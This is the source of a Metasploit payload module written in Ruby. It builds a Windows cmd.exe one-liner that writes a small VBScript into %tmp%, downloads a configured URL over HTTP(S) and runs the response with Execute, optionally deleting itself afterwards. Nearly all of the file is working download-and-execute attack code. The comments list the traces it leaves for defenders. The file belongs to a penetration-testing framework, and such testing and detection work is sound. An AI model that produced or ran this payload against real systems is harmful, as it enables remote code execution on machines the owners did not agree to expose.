GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/cmd/windows/download_eval_vbs.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Single-stage Windows command payload (ARCH_CMD, no handler) that emits a
# one-line cmd.exe command. As assembled in #command_string, that command
# writes a tiny VBScript into %tmp% and starts it; the script fetches the
# configured URL with Microsoft.XMLHTTP and passes the response body to
# VBScript's Execute.
#
# Artifacts this leaves for defenders, all visible in the string built below:
#   * a .vbs file with a random 1-2 letter name created in %tmp% through an
#     `echo ... >file` redirection;
#   * `start` launching that file (via wscript when INCLUDEWSCRIPT is set);
#   * a script host issuing an HTTP(S) GET and executing the returned text;
#   * when DELETE is set, the script removing its own .vbs file through
#     Scripting.FileSystemObject.
module MetasploitModule

  CachedSize = :dynamic

  include Msf::Payload::Single
  include Msf::Sessions::CommandShellOptions

  # Registers the module metadata and its four datastore options.
  #
  # @param info [Hash] caller-supplied module info merged with the defaults below
  def initialize(info = {})
    # The line break inside 'Description' is part of the string literal.
    module_details = {
      'Name' => 'Windows Executable Download and Evaluate VBS',
      'Description' => 'Downloads a file from an HTTP(S) URL and executes it as a vbs script.
Use it to stage a vbs encoded payload from a short command line. ',
      'Author' => 'scriptjunkie',
      'License' => BSD_LICENSE,
      'Platform' => 'win',
      'Arch' => ARCH_CMD,
      'Handler' => Msf::Handler::None,
      'Session' => Msf::Sessions::CommandShell,
      'PayloadType' => 'cmd',
      'RequiredCmd' => 'wscript',
      'Payload' => {
        'Offsets' => {},
        'Payload' => ''
      }
    }
    super(merge_info(info, module_details))

    # URL is required and is placed into the command verbatim (see
    # #command_string); the three booleans default to false.
    module_options = [
      OptString.new('URL', [ true, "The pre-encoded URL to the script" ]),
      OptBool.new('INCLUDECMD', [ true, "Include the cmd /q /c", false ]),
      OptBool.new('INCLUDEWSCRIPT', [ true, "Include the wscript command", false ]),
      OptBool.new('DELETE', [ true, "Delete created .vbs after download", false ])
    ]
    register_options(module_options)
  end

  # Returns the parent-generated payload with the command line appended.
  #
  # @param _opts [Hash] forwarded unchanged to the parent implementation
  def generate(_opts = {})
    super + command_string
  end

  # Assembles the cmd.exe one-liner from the datastore options.
  #
  # The URL option is interpolated as-is: nothing here escapes characters that
  # are special to cmd.exe or to a VBScript string literal, which is why the
  # option text asks for a pre-encoded URL.
  #
  # @return [String] the complete command line
  def command_string
    # rand(2) yields 0 or 1, so both random names are one or two letters long,
    # which keeps the command short.
    script_stem = Rex::Text.rand_text_alpha(1+rand(2))
    http_obj = Rex::Text.rand_text_alpha(1+rand(2))

    pieces = []
    pieces << "cmd.exe /q /c " if datastore['INCLUDECMD']

    # Everything from `echo` up to the `>` redirection is the VBScript body,
    # written as colon-separated statements on a single line.
    pieces << "cd %tmp%&echo Set #{http_obj}=CreateObject(\"Microsoft.XMLHTTP\"):"
    pieces << "#{http_obj}.Open \"GET\",\"#{datastore['URL']}\",False:"
    pieces << "#{http_obj}.Send:"
    pieces << "Execute #{http_obj}.responseText"
    pieces << ":CreateObject(\"Scripting.FileSystemObject\").DeleteFile \"#{script_stem}.vbs\"" if datastore['DELETE']

    # The script is launched through `start` rather than invoked directly so
    # that the console window goes away quickly, before the wscript libraries
    # load and the download happens.
    pieces << " >#{script_stem}.vbs"
    pieces << "&start "
    pieces << "wscript " if datastore['INCLUDEWSCRIPT']
    pieces << "#{script_stem}.vbs"

    pieces.join
  end
end